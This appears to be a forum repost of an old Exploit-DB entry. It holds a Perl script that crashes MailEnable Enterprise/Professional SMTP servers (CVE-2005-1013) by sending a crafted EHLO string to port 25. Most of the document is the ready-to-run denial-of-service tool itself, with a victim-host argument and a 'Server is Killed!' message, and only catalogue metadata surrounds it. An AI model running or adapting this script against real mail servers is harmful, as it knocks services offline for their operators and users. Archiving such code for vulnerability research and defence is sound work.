Exploit MailEnable Enterprise 1.x - SMTP Remote Denial of Service

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
916
Проверка EDB
  1. Пройдено
Автор
CORRYL
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2005-1013
Дата публикации
2005-04-05
Код:
#!/usr/bin/perl
##################################################################################
#MailEnable (Enterprise <= 1.04)-(Professional <= 1.54 SMTPd remote DOS exploit  #        
#                                                                                #
#                                                                                #   
#this tools causes the crash of the demon SMTP of mailenable                     #
#the bug and' caused he/she knows an unicode string sent to the command          #
#EHLO                                                                            #
#                                                                                #
#BUG discovered By CorryL                                                        # 
#Coded by CorryL                                                                 #  
#  	                                                  info: www.x0n3-h4ck.org#
##################################################################################
use IO::Socket; 
use Getopt::Std; getopts('h:', \%args);


if (defined($args{'h'})) { $host = $args{'h'}; }

print STDERR "\n-=[MailEnable (Enterprise & Professional) SMTPd remote DOS exploit]=-\n";
print STDERR "-=[                                                               ]=-\n";
print STDERR "-=[ Discovered & Coded by CorryL            info:www.x0n3-h4ck.org]=-\n";
print STDERR "-=[ irc.xoned.net #x0n3-h4ck                 corryl80[at]gmail.com]=-\n\n";

if (!defined($host)) {
Usage();
}

$bof = "\0x99";
print "[+]Connecting to the Host $host\n";
$socket = new IO::Socket::INET (PeerAddr => "$host",
                                PeerPort => 25,
                                Proto => 'tcp');
                                die unless $socket;
                                print "[+]Sending Unicode String\n";
                                print $socket "EHLO $bof\r\n";
                                print "[+]Server is Killed!\n";  
                              

close;

sub Usage {
print STDERR "Usage:
-h Victim host.\n\n";
exit;
}

# milw0rm.com [2005-04-05]
 
Источник
www.exploit-db.com

Похожие темы